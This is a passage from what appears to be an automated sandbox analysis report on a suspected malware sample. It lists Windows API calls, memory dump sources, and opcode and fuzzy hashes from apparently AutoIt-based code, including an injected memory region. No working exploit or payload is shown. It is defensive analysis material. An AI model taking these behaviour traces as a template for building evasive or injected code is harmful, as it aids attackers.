                                                          • RtlAllocateHeap.NTDLL(00000008,00121129,00000000,?,00152E29,00000001,00000364,?,?,?,0014F2DE,00153863,001F1444,?,0013FDF5,?), ref: 00154CBE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 96fbfeb3f53814b9392c19cb35e3f2e9cad3ee64d0bd6b4cfb637325c0ca6005
                                                          • Instruction ID: ef87a8ab743d6932f59bb388ea65c99bc9f9562a75837e15b7c13a134c34e0bc
                                                          • Opcode Fuzzy Hash: 96fbfeb3f53814b9392c19cb35e3f2e9cad3ee64d0bd6b4cfb637325c0ca6005
                                                          • Instruction Fuzzy Hash: EDF0E931602224E7DB215F66DC05F5A3788BFD17BAB154115BC39BF290CB70D88996E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?,001F1444,?,0013FDF5,?,?,0012A976,00000010,001F1440,001213FC,?,001213C6,?,00121129), ref: 00153852
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: be4b43572b56cbb446ce85afe93eeabaed6474fca97ded6bb3622394c432cafa
                                                          • Instruction ID: 7ffd40e25b62a93aa8806c93db49da96873ab40262bff36c0ff8669d151168fe
                                                          • Opcode Fuzzy Hash: be4b43572b56cbb446ce85afe93eeabaed6474fca97ded6bb3622394c432cafa
                                                          • Instruction Fuzzy Hash: B1E0E531100224E7D63926669C00B9A3648AB527F2F050325BC34AB9E0CB51DD0581E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 00154D9C
                                                            • Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
                                                            • Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorFreeHeapLast_free
                                                          • String ID:
                                                          • API String ID: 1353095263-0
                                                          • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                          • Instruction ID: e676c5422ac6c1e52d6dab429fb543bc39287b51f6106570763f4c4533d0922e
                                                          • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                          • Instruction Fuzzy Hash: 7EE06D361002059F8720CEACD400A92B7F4EF953257208529ECADD7310D331E856CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124F6D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: e5732df6fbae33a928fd246901463005254bc6711736d7853a4a296e5ae809c3
                                                          • Instruction ID: 3504facc0b8937b3beed818e0ccfb99e5bd37bde00a6f598d5b9efabe306f384
                                                          • Opcode Fuzzy Hash: e5732df6fbae33a928fd246901463005254bc6711736d7853a4a296e5ae809c3
                                                          • Instruction Fuzzy Hash: 23F03071105761CFDB389F68F590812B7E4FF54319311897EE1EA82521C7319894DF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00122DC4
                                                            • Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath_wcslen
                                                          • String ID:
                                                          • API String ID: 541455249-0
                                                          • Opcode ID: 03a98dbfce5ad959f6563421ad9b96753ad9d6d6771ac376705c79789d7992d5
                                                          • Instruction ID: 19aee621cdcc0bed90cf21bc1d7eba188f6cdbefc6ce180ca12d8a63b6995ffc
                                                          • Opcode Fuzzy Hash: 03a98dbfce5ad959f6563421ad9b96753ad9d6d6771ac376705c79789d7992d5
                                                          • Instruction Fuzzy Hash: DFE0CD726001245BC72092589C05FDA77DDDFC8790F0401B1FD09D7248DB60AD848590
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock
                                                          • String ID:
                                                          • API String ID: 2638373210-0
                                                          • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                          • Instruction ID: 5175dfc4ab9e320b71cacd7c5c1821ff376dd12ceae130ac01efd7e6635d66fc
                                                          • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                          • Instruction Fuzzy Hash: 28E04FB0609B005FDF399E28A8517B677E89F4A300F00086EFA9B83652E67268458A4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00123837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00123908
                                                            • Part of subcall function 0012D730: GetInputState.USER32 ref: 0012D807
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00122B6B
                                                            • Part of subcall function 001230F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0012314E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                          • String ID:
                                                          • API String ID: 3667716007-0
                                                          • Opcode ID: 024737671d7df08885f2506604e3d6f73f282b4c5c02ed8f02c0676b66953d56
                                                          • Instruction ID: 826114c51081a31d19feb1f72958eb6c58beb452020a4b5181e1e39abdf900f8
                                                          • Opcode Fuzzy Hash: 024737671d7df08885f2506604e3d6f73f282b4c5c02ed8f02c0676b66953d56
                                                          • Instruction Fuzzy Hash: D8E07D2130022C17C704BB74B81247DB349DBF1311F40053EF19247173CF2845B583A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?), ref: 023C08EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                          • Instruction ID: 09ad03ca8eb18f5a3a478278a6cc2d4f2881b231851de58e916655bc74bffedf
                                                          • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                          • Instruction Fuzzy Hash: E5E0867150524CDBD71CCBB88D047A973B8D708314F204659E415C3191D6308D40D754
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?), ref: 023C08BB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                          • Instruction ID: f195843890c31a2b12f39a6277fd024fbbc876314e348f379aa32270b3d057a2
                                                          • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                          • Instruction Fuzzy Hash: 49D0A73190A30CEBCB10CFB49C04ADA73ACDB04320F108758FD15D3281D6319D409B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,00000000,?,00160704,?,?,00000000,?,00160704,00000000,0000000C), ref: 001603B7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 9f7b47823d0fc6b92c9223170a26d0050d38dcf0a524ecdae04cffafcd24f79a
                                                          • Instruction ID: 561157d79569ac7586af0f1972e164d2ca51e728bb43fb9ad0dc70c2ad9f927a
                                                          • Opcode Fuzzy Hash: 9f7b47823d0fc6b92c9223170a26d0050d38dcf0a524ecdae04cffafcd24f79a
                                                          • Instruction Fuzzy Hash: 96D06C3204010DFBDF029F84DD06EDA3BAAFB48714F014100BE1866020C732E861AB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00121CBC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem
                                                          • String ID:
                                                          • API String ID: 3098949447-0
                                                          • Opcode ID: e7396c59d0328b17ba927be60194ba8c58b9cd4de0ed84ebc77582ceec31209b
                                                          • Instruction ID: 46888ee09dd54a2224ea22da113ef4584fd596137d869022d8959a534afae1c3
                                                          • Opcode Fuzzy Hash: e7396c59d0328b17ba927be60194ba8c58b9cd4de0ed84ebc77582ceec31209b
                                                          • Instruction Fuzzy Hash: 4DC09B36380305EFF2145780BC4AF607754B348B10F044001F60955DF3C3B11490D650
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00125745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0012949C,?,00008000), ref: 00125773
                                                          • GetLastError.KERNEL32(00000002,00000000), ref: 001976DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CreateErrorFileLast
                                                          • String ID:
                                                          • API String ID: 1214770103-0
                                                          • Opcode ID: 7a0895844175d715ef36ee5a8327fe42ad379f2d5dcc3232be1d6b94672ce1f4
                                                          • Instruction ID: 0bb2bd52dc35eafcff403f9fd98cddaa6e201d53f0ede0c09fb4d633e07a122f
                                                          • Opcode Fuzzy Hash: 7a0895844175d715ef36ee5a8327fe42ad379f2d5dcc3232be1d6b94672ce1f4
                                                          • Instruction Fuzzy Hash: 0081AB306087119FDB14EF28D491A6EB7E1BF98714F04492DF88A5B2E2DB30ED55CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: eb75e4dc192ef99ac155202ee6393cc1b5625cd7346ddff0a9fb3486e1a78cab
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: A731F374A00109DBD718CF99D484969FBB1FF49310F2596A9E80ACB656D731EDC2DBC0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 023C2312
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 3096e14d89e75d91452536fdabd5f28b039f6dbb9701e42d89b7019d45377341
                                                          • Instruction ID: 1c4f6602db3d311531ac662211814a38eed1248d8ba90b18141aff62000f97e3
                                                          • Opcode Fuzzy Hash: 3096e14d89e75d91452536fdabd5f28b039f6dbb9701e42d89b7019d45377341
                                                          • Instruction Fuzzy Hash: 4E01B63194010EAFCF05EFE4C989AEEBB75FF04311F204559FA1AA6580DB30AA51CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 023C2312
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: dce1e67ee7a905aee1ad479c7a3e30644d0bd5a7b1fbfaf3e5e7a496efc26c57
                                                          • Instruction ID: 74e874f0ba58a53292c611eed0f4045d18f08d8b8b151636d1d271fdb058361c
                                                          • Opcode Fuzzy Hash: dce1e67ee7a905aee1ad479c7a3e30644d0bd5a7b1fbfaf3e5e7a496efc26c57
                                                          • Instruction Fuzzy Hash: 4AF0797194410EAFCF05EFE4C949AEEBB75FF04311F604569FA1AA6180DB30EA51CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00139BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00139BB2
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 001B961A
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001B965B
                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 001B969F
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001B96C9
                                                          • SendMessageW.USER32 ref: 001B96F2
                                                          • GetKeyState.USER32(00000011), ref: 001B978B
                                                          • GetKeyState.USER32(00000009), ref: 001B9798
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001B97AE
                                                          • GetKeyState.USER32(00000010), ref: 001B97B8
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001B97E9
                                                          • SendMessageW.USER32 ref: 001B9810
                                                          • SendMessageW.USER32(?,00001030,?,001B7E95), ref: 001B9918
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 001B992E
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 001B9941
                                                          • SetCapture.USER32(?), ref: 001B994A
                                                          • ClientToScreen.USER32(?,?), ref: 001B99AF
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001B99BC
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001B99D6
                                                          • ReleaseCapture.USER32 ref: 001B99E1
                                                          • GetCursorPos.USER32(?), ref: 001B9A19
                                                          • ScreenToClient.USER32(?,?), ref: 001B9A26
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 001B9A80
                                                          • SendMessageW.USER32 ref: 001B9AAE
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 001B9AEB
                                                          • SendMessageW.USER32 ref: 001B9B1A
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001B9B3B
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 001B9B4A
                                                          • GetCursorPos.USER32(?), ref: 001B9B68
                                                          • ScreenToClient.USER32(?,?), ref: 001B9B75
                                                          • GetParent.USER32(?), ref: 001B9B93
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 001B9BFA
                                                          • SendMessageW.USER32 ref: 001B9C2B
                                                          • ClientToScreen.USER32(?,?), ref: 001B9C84
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001B9CB4
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 001B9CDE
                                                          • SendMessageW.USER32 ref: 001B9D01
                                                          • ClientToScreen.USER32(?,?), ref: 001B9D4E
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001B9D82
                                                            • Part of subcall function 00139944: GetWindowLongW.USER32(?,000000EB), ref: 00139952
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001B9E05
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                          • String ID: @GUI_DRAGID$F
                                                          • API String ID: 3429851547-4164748364
                                                          • Opcode ID: 14831b63ee61a2285a83a4bb74460dd12b4619f1b57529b4df2db38dc84fbda8
                                                          • Instruction ID: 345b1ed5f268085b66dd21059cd271147b266bd6f683c82729cc9143955e0917
                                                          • Opcode Fuzzy Hash: 14831b63ee61a2285a83a4bb74460dd12b4619f1b57529b4df2db38dc84fbda8
                                                          • Instruction Fuzzy Hash: 2F42AB74204241AFDB24CF28CC84EEABBE5FF49314F144619F699876A1D771E8A2CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001B48F3
                                                          • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 001B4908
                                                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 001B4927
                                                          • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 001B494B
                                                          • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 001B495C
                                                          • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 001B497B
                                                          • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001B49AE
                                                          • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001B49D4
                                                          • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 001B4A0F
                                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001B4A56
                                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001B4A7E
                                                          • IsMenu.USER32(?), ref: 001B4A97
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001B4AF2
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001B4B20
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001B4B94
                                                          • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 001B4BE3
                                                          • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 001B4C82
                                                          • wsprintfW.USER32 ref: 001B4CAE
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001B4CC9
                                                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 001B4CF1
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001B4D13
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001B4D33
                                                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 001B4D5A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                          • String ID: %d/%02d/%02d
